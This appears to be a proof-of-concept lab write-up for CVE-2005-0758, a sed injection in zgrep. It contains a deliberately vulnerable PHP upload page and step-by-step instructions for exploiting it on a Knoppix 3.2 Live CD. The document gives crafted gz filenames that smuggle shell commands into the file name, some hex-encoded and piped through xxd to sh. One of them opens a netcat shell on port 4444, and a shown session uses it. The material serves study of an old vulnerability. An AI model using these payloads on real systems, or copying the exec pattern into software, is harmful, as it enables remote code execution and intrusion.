uploaded file infomartion:
(no file uploaded)');
} else{
$is_gz_str = 'no';
$original_file_basename = basename($_FILES['file']['name']);
$original_file_pathinfo = pathinfo($original_file_basename);
if($original_file_pathinfo['extension'] === 'gz') {
$is_gz_str = 'yes';
// move to ./gz_stored/
move_uploaded_file($_FILES['file']['tmp_name'], './gz_stored/'. $original_file_basename);
// exec zgrep
exec('zgrep CVE gz_stored/*.gz', $search_results);
// save search results
$fp = fopen('./gz_stat/latest-search-result.txt', 'w');
foreach ($search_results as $line) {
fwrite($fp, $line. "\n");
}
fclose($fp);
}
print('
file name: '. htmlspecialchars($_FILES['file']['name']). '
');
print('
tmp file name: '. htmlspecialchars($_FILES['file']['tmp_name']). '
');
print('
stored to gz_stored/ directory: '. htmlspecialchars($is_gz_str). '
');
}
?>
about CVE-2005-0758
this is an ancient vulnerability of zgrep. in case of GNU gzip, zgrep is a wrapper script.
about sed injection
try this sample on Knoppix 3.2
Apache 1.3.27, PHP 4.2.3, and vulnerable zgrep are installed from the beginning when booting from Knoppix 3.2 (released at 2003) Live CD.
you can run this sample on Knoppix 3.2 very easily without special settings.
download Knoppix iso
try RCE
- boot Knoppix Live CD ordinarily
- put this file (cve-2005-0758.php) on /var/www/ on server. "server" means Knoppix.
- change owner and chmod (on server)
$ cd /var/www
$ sudo chown www-data:www-data cve-2005-0758.php
$ sudo chmod 600 cve-2005-0758.php
- start apache (on server)
$ sudo apachectl start
- try connect from a client machine to http://<knoppix>/cve-2005-0758.php
(when Knoppix is running on VirtualBox or some such, "client machine" means host OS)
- create some directories in /var/www (on server)
$ cd /var/www
$ sudo mkdir gz_stat
$ sudo mkdir gz_stored
- change owner and chmod (on server)
$ sudo chown www-data:www-data gz_stat gz_stored
$ sudo chmod 707 gz_stat gz_stored
- create an ordinary gz file (on client)
$ echo CVE-2005-0758 > hoge.txt
$ gzip hoge.txt
$ wc -c hoge.txt.gz
43 hoge.txt.gz
- access from the client machine to http://<knoppix>/cve-2005-0758.php
and upload hoge.txt.gz
- check if you have successfully uploaded (on server)
$ cd /var/www/gz_stored
$ sudo wc -c hoge.txt.gz
43 hoge.txt.gz
$ cat ../gz_stat/latest-search-result.txt
CVE-2005-0758
- create a new gz file with a crafted filename (on client)
$ cp hoge.txt.gz '|;edate;#.gz'
- access to http://<knoppix>/cve-2005-0758.php again and upload a new file
- check if date command was executed and the search results are weird (on server)
$ cd /var/www/gz_stat
$ cat latest-search-result.txt
gz_stored/hoge.txt.gz:CVE-2005-0758
Tue Aug 8 14:54:20 CEST 2023
gz_stored/CVE-2005-0758
- delete a file with a crafted filename (on server)
(not necessary to do, but may be confusing if there are multiple files with crafted filenames on server)
and do NOT delete hoge.txt.gz$ cd /var/www/gz_stored
$ sudo rm -rf *'#.gz'
crafted filenames examples
several commands
- you can exec several commands (this only taints the search results):
|;edate;whoami;id;#.gz
exec xgalaga on server-side
- this may not work:
|;exgalaga;#.gz
- this works fine (exec /usr/games/xgalaga):
|;eecho 2f7573722f67616d65732f7867616c6167610a|xxd -r -p|sh;#.gz
get a reverse shell
- exec 'nc -lnvp 4444 -e /bin/sh':
|;eecho 6e63202d6c6e76702034343434202d65202f62696e2f73680a|xxd -r -p|sh;#.gz
- try connect to a reverse shell with netcat (from a client machine)
$ nc 192.168.1.3 4444
uname -a
Linux Knoppix 2.4.21-xfs #1 SMP Fre Jul 25 00:06:47 CEST 2003 i686 GNU/Linux
pwd
/var/www
whoami
www-data